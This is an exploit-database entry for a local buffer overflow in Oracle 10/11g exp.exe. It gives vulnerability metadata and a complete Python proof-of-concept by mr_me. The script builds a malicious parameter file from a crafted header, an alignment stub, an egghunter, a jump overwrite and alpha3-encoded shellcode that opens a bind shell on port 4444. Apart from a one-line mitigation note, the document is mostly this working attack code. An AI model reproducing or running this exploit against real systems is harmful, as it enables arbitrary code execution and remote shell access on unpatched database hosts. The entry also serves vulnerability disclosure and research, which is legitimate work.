Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit

vendor:

Oracle Database

by:

mr_me

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Oracle Database

Affected Version From: 10.x

Affected Version To: 11g r1

Patch Exists: NO

Related CWE:

CPE: a:oracle:database:10.x, cpe:/a:oracle:database:11g_r1

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2010

Oracle 10/11g exp.exe – param file Local Buffer Overflow PoC Exploit

This is a proof-of-concept exploit for a local buffer overflow vulnerability in Oracle 10/11g exp.exe. It allows an attacker to execute arbitrary code by exploiting a buffer overflow in the param file. This vulnerability was discovered around 9/3/2010.

Mitigation:

Update to a patched version of Oracle 10/11g or apply the necessary security patches.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit
# Date found approx: 9/3/2010
# Software Link: http://www.oracle.com/technology/products/database/oracle10g/index.html
# Version: 10.x and 11g r1 (r2 untested)
# Tested on: Windows XP SP3 En
# Usage:
# $ORACLE_HOME\exp.exe system parfile=overflow_oracle_exp.txt

def banner():
    print "\n\t| ------------------------------------- |"
    print "\t| Oracle exp.exe code execution explo!t |"
    print "\t| by mr_me - net-ninja.net ------------ |\n"
	
header = ("\x69\x6E\x64\x65\x78\x65\x73\x3D\x6E\x0D\x0A\x6C\x6F\x67\x3D\x72\x65\x73\x75"
"\x6C\x74\x73\x2E\x74\x78\x74\x0D\x0A\x66\x69\x6C\x65\x3D");

# aligned to edx
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

# bind shell on port 4444, alpha3 encoded and aligned with edi
sc = ("hffffk4diFkDwj02Dwk0D7AuEE4n07073K023H8O8L4t8O1M0z110q160q150e2N0n7K0i1K130"
"J0g0i1400110t16090y150r0V122l0s080o0y0r2M0s13150r122k0t0W0q2M0e0v0t0a0s110q000p1"
"P0h2m0j0A0s0q0z7m1M2x1N1N142G1N7l0t0r1N2F1O061O7m1M121O010g0x0i1K0f04130t107p180"
"10t2y0s2Z0j130w7p1P7l0g051P2N1N08191N147k0q1K0h7o0d2r0b2I122F1N2I1N130c2Z0d2Z187"
"l0d2F0i2l122H1O2o122l1M1M2k191K180o2N1L020g05112o1N2j1M121P0w112k1K2F1O2k1N0y121"
"90e0w0r2M0r7m0g2J1O100h2I0e0r0c0r1P7o1O0x117k0i0v1P0z147o0z060e7m0s7K102A1O0p100"
"90e7k0y2y2o2B162A0r1K0p2q0d2m1M2o0s0z1M1O0w150y0v0c2I132Z0i190t2F0g2D182F0u7l0q2"
"O0x120y0p0f2l0a7N17130w7N0i0c0t030b2t1N2F172u1N0p0z2M0c2O1O2n162J0g2D0g0x142k122"
"k112E0g0u0u2O0v1912120g2M0d0v1N191L0r0f2D1N131O121O0y0c2E0u0z1N0y1O7p14170z2O1O1"
"50g0s0y7M1N7m0a0u122N0d170t120a101M2I1L1416001L1K0a1L1O2H0z000e7m1M151M010r2N0u2"
"D0g190d2l0t0s142K0w2j142F157m1O2A1M2Z0g2z0a2N0p111500170r122B182H1N030x2z0v7l1K0"
"x0f2M0g7m1L0q0e2J0x2E1M7o1119100q0w1414101O021L0z161O0z2H1M7k0r001L7n0g7p1M2j1L0"
"u1714157m1N191M2Z14041N2M0v2E19140f2H0e7l1O021L2o0d1915010t0p15061O041M7p1K130g0"
"t1L2s172A1M0p17030w191O2O1O110d0w1M141M7m117p0f070t1716020w0q0f040f09182C1L7p0f2"
"C0b170d1N0c1M1L7n1O191N2E162E0d7m0h0w1N2C0q061M2m1M2j1K0g1M010e13127p1O7n0f130b7"
"p1K120i130u2D0b1M0x110z2L0x2n0v2C0g2H1N0w0y2C1P1M1M2N0f0w0f2j1O2O1M7n0u02172k150"
"7140x0d0s141N0v2F0b2l152E0u03142o0t0v1N2n1M080f2K0x2m1L2k110c1M2l141M1N171M050f2"
"L1M2j1O0213051N2l1M020i180r7n1N0w190q1L7l14101N171L0q0e2H1O011M0311121O7N1K2O1N2"
"C16060d1M1M161M2K1N0u1M2N01VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEJN"
"0I673K0L3N8O8L5D8O131J171A161A151T7N6N7K1Y15121J1W6O1510111D17191I151C1W17LL1E68"
"6O1I1C7M1C1M151C13LK1E1W1GLK1U1G1E1Q1C116P106P1Q1YLM6K1A1C1A1KLL1L691N1K1J171O7Z"
"1B1B1H161N161NLL1H121N111W161Y1K1W15131E1N1019101E691BLL64151F601QLM1V141Q7N1O18"
"191N127J6P1K6N7O1T631S681L161H181O131R7Z1U7Z19LM7O171YLM161Y1OLO12191M13181I1K19"
"6O681M141V1511191M1J1M131Q1G117Z10171OLN1N1I12181T1G1C7M1C1C1V7J1O101Y681T1C1S1B"
"1QLN1O16171K1Y1G1Q1K15LN1N1F1TLLLMLM161O1O1F11181T1K1I681D1317601C1J6P601QLM1MLN"
"1B1J1M1O1G151I6P1S18157K1Y191B101W1419661A1M6P7N1L1C1ILN1U1L1Q68141B1G7O1Y1S1E12"
"1W641O6712651N1A11LL1T141L1O177J69151W1L177J12LK1O151W1E1F1J1F19121L1T1N1T161N19"
"1L1C1P141J1E1O131N1O1R641D1J1N1I1L1F14141ILO1O151W1B1I7L1OLM1Q1E177O1T1L1G1C1Q10"
"13LL1L1417101L1K1Q1M1N691K101TLL1H151L101D101D651R191TLL1D1C157J1C1K156714LL1N61"
"1L7Z1W7K7JLO6P11141N171D141219681O121H7K1GLM1K1I7MLL1V191M111T7K131411111JLO101G"
"1D7Z14101N141L1K171N1K691K7K1C101H1O1TLK1N1K1L1D131E14LL1N181K7J101E1O6818151914"
"68191TLM1N121LLO1T1914111D6P14161I621L601H1B1W1B1I1216611M6P16151D1O1N7O1L1A1T1F"
"1I1D1L1917111P661A1617161G101W147J1719601O101W631S1A1T1M1SLL1MLN1O181O6517651ULL"
"1Y1F1O661E1F1MLL1I1K1K1R1I1A1U1313611N1E68121S671H1I1Y101F151R1L1M111L1B1K1O1G63"
"1V7L1N1D1L121P1M13LN1V191U1J1N7O1LLN1D1114LN1417141H1T1C14101G651QLO14651D1C14LO"
"1D1F1NLN1L191W7M1K1M1LLO11651MLL141L1N161L131W7M1I1K1N1312151NLL1L121YLK1D181N1G"
"191B1MLO1J101N171L1A1T681N101L1311131O7O10LO1O6317161T1H1H171L7K1NLN1L7M01WWYA44"
"44444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABAB"
"QI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBJKKS0YJKKU9XJXKOKOKO0O0I0I0I0I0I0I0"
"Q0Z0V0T0X0603000V0X0411000B060H0H000B03000B0C0V0X020B0D0B0H041102110D00110D0T0B0"
"D0Q0B00110D110V0X040Z080B0D0J0O0M0N0O0L060K0N0O0D0J0N0I0O0O0O0O0O0O0O0B0V0K0X0N0"
"V0F020F020K080E0D0N0C0K0X0N0G0E0P0J0W110P0O0N0K080O040J110K0X0O0U0B0R11000K0N0C0"
"N0B0S0I0T0K080F0S0K0X11000P0N11030B0L0I090N0J0F0X0B0L0F0W0G00110L0L0L0M0P11000D0"
"L0K0N0F0O0K030F0U0F0B0J0B0E0W0C0N0K0X0O0U0F0R110P0K0N0H060K0X0N0P0K040K0H0O0U0N1"
"111000K0N0C000N0R0K0H0I080N060F0B0N11110V0C0L110C0B0L0F0F0K0H0B0T0B030K0X0B0D0N0"
"P0K080B0G0N110M0J0K0H0B0T0J0P0P050J0F0P0X0P0D0P0P0N0N0B050O0O0H0M110S0K0M0H060C0"
"U0H0V0J060C030D030J0V0G0G0C0G0D030O0U0F0U0O0O0B0M0J0V0K0L0M0N0N0O0K0S0B0E0O0O0H0"
"M0O050I0H0E0N0H0V110H0M0N0J0P0D000E0U0L0F0D0P0O0O0B0M0J060I0M0I0P0E0O0M0J0G0U0O0"
"O0H0M0C0E0C0E0C0U0C0U0C0E0C040C0E0C040C050O0O0B0M0H0V0J0V11110N050H060C050I08110"
"N0E0I0J0F0F0J0L0Q0B0W0G0L0G0U0O0O0H0M0L060B01110E0E050O0O0B0M0J060F0J0M0J0P0B0I0"
"N0G0U0O0O0H0M0C050E050O0O0B0M0J060E0N0I0D0H080I0T0G0U0O0O0H0M0B0U0F050F0E0E050O0"
"O0B0M0C0I0J0V0G0N0I070H0L0I070G0E0O0O0H0M0E0U0O0O0B0M0H060L0V0F0F0H060J0F0C0V0M0"
"V0I080E0N0L0V0B0U0I0U0I0R0N0L0I0H0G0N0L060F0T0I0X0D0N110C0B0L0C0O0L0J0P0O0D0T0M0"
"20P0O0D0T0N0R0C0I0M0X0L0G0J0S0K0J0K0J0K0J0J0F0D0W0P0O0C0K0H0Q0O0O0E0W0F0T0O0O0H0"
"M0K0E0G050D051105110U11050L0F110P1105110E0E05110E0O0O0B0M0J0V0M0J0I0M0E000P0L0C0"
"50O0O0H0M0L0V0O0O0O0O0G030O0O0B0M0K0X0G0E0N0O0C080F0L0F060O0O0H0M0D0U0O0O0B0M0J0"
"60O0N0P0L0B0N0B060C0U0O0O0H0M0O0O0B0M0ZKPA")

# align edx
# MOV EDX,ESP
# SUB EDX,64
# SUB EDX,64
# SUB EDX,64
# SUB EDX,32
# SUB EDX,64			
# JMP EDX
align = ("\x8b\xd4\x83\xea\x64\x83\xea\x64\x83"
"\xea\x64\x83\xea\x32\x83\xea\x64\xff\xe2\x43");

exploit = header
exploit += "\x43" * 39
exploit += align
exploit += egghunter
exploit += "\x41" * (533-len(exploit))
exploit += "\xe9\x2a\xfe\xff\xff"
exploit += "\xbb\x8b\xe2\x61"
exploit += "\xeb\xf5"
exploit += "\x41" * 100
exploit += "\x57\x30\x30\x54" * 2
exploit += sc
exploit += "\x43" * (6000-len(exploit))
exploit += ".dmp"
banner()
print ("[+] Shellcode byte size: %s" % (len(sc)))
print ("[+] Writing %s bytes of exploit code to param file" % (len(exploit)))
pwnfile = open('overflow_oracle_exp.txt','w');
pwnfile.write(exploit);
pwnfile.close()
print "[+] Exploit overflow_oracle_exp.txt file created!"